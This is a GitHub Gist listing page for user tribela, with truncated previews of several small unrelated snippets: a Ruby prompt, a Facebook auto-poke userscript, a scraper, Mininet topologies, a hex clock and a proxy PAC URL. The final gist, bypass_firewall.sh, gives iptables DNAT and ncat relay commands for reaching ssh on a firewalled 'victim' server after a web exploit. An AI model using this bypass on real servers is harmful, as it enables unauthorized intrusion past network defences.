Skip to content

Instantly share code, notes, and snippets.

View tribela's full-sized avatar
😺
😼

Jeong Arm tribela

😺
😼
View GitHub Profile
@tribela
tribela / prompt.rb
Created February 20, 2014 02:48
ruby readline while printing
# encoding: UTF-8
require "EventMachine"
require "readline"
prompt = '⚡ '
def mutex
@mutex || Mutex.new
end
require 'net/http'
require 'uri'
Earthquake.init do
output_filter do |item|
next unless item['text']
text = item["text"]
text.scan( /http:\/\/t\.co\/[a-zA-Z0-9\-]+/ ).each do |url|
uri = URI.parse url
Net::HTTP::start( uri.host , uri.port ) do |connection|
connection.request_get uri.path do |response|
// ==UserScript==
// @name Facebook autopoke
// @namespace Kjwon15
// @description Facebook auto revenge poke
// @include http://*.facebook.com/pokes*
// @include https://*.facebook.com/pokes*
// ==/UserScript==
auto_poke=function(){
if (document.location.pathname.startsWith('/pokes') === false) {
# coding:utf-8
from contextlib import closing
from six.moves import urllib
from lxml import html
indexes = [
u'ㄱ', u'ㄴ', u'ㄷ', u'ㄹ', u'ㅁ', u'ㅂ', u'ㅅ', u'ㅇ', u'ㅈ', u'ㅊ', u'ㅋ',
u'ㅌ', u'ㅍ', u'ㅎ',
u'0',
u'A', u'B', u'C', u'D', u'E', u'F', u'G', u'H', u'I', u'J', u'K', u'L',
@tribela
tribela / gist:6a044c733e43ffb629b6
Created July 27, 2014 14:15
Proxy is poisoned
data:text/javascript,function%20FindProxyForURL(url%2C%20host)%20%7Bif%20(shExpMatch(url%2C%20'http%3A%2F%2Fplay.spotify.com*')%20%7C%7C%20shExpMatch(url%2C%20'https%3A%2F%2Fplay.spotify.com*')%20%7C%7C%20shExpMatch(url%2C%20'https%3A%2F%2Fwww.spotify.com*')%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fwww.spotify.com*')%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fwww.crunchyroll.com*')%20%7C%7C%20host%20%3D%3D%20'www.pandora.com'%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fwww.last.fm*')%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fext.last.fm*')%20%7C%7C%20(url.indexOf('proxmate%3Dactive')%20!%3D%20-1%20%26%26%20url.indexOf('amazonaws.com')%20%3D%3D%20-1)%20%7C%7C%20(url.indexOf('proxmate%3Dus')%20!%3D%20-1)%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fpiki.fm*')%20%7C%7C%20shExpMatch(url%2C%20'https%3A%2F%2Fpiki.fm*')%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fgrooveshark.com*')%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fretro.grooveshark.com*')%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fhtml5.groo
import os
import sys
from PIL import Image
def dhash(image, hash_size=8):
image = image.convert('L').resize(
(hash_size + 1, hash_size),
Image.ANTIALIAS)
diff = []
@tribela
tribela / custom_topo.py
Last active August 29, 2015 14:13
Mininet custom topologies
from mininet.topo import Topo
class RingTopo(Topo):
def __init__(self, switch_count=4, host_count=1):
Topo.__init__(self)
switches = [self.addSwitch('s{0}'.format(i+1))
for i in range(switch_count)]
@tribela
tribela / index.html
Last active August 29, 2015 14:19
Hex editor clock
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<link rel="stylesheet" href="style.css" type="text/css" media="all" charset="utf-8">
<script src="script.js" type="text/javascript"></script>
<title>Hex editor</title>
</head>
<body>
@tribela
tribela / angel.js
Last active August 29, 2015 14:21
angel.js
var start = undefined;
var THRESHOLD = 6 * 1000;
var imgSrc = 'data:image/png;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAJABAADASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD5/ooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigBdx6Z4oDHsTSUuadwHBierHFWIm
@tribela
tribela / bypass_firewall.sh
Last active August 29, 2015 14:27
open ssh connection into server that protected by external firewall only 80 port is opened
# Victim is a web server that is protected by external firewall. 80 port is opened and 22 (ssh) port is filtered.
# You cannot connect ssh into the server in this situation. But if you can run a single command (maybe web vulnerablity),
# You can get into the server.
victim $ iptables -t nat -A PREROUTING -p tcp --dport 80 --sport 31337 -j DNAT --to :22
attacker $ ncat -e "/bin/nc <victim> 80 -p 31337" -l 2222
attacker $ ssh -p 2222 localhost
# Or use iptables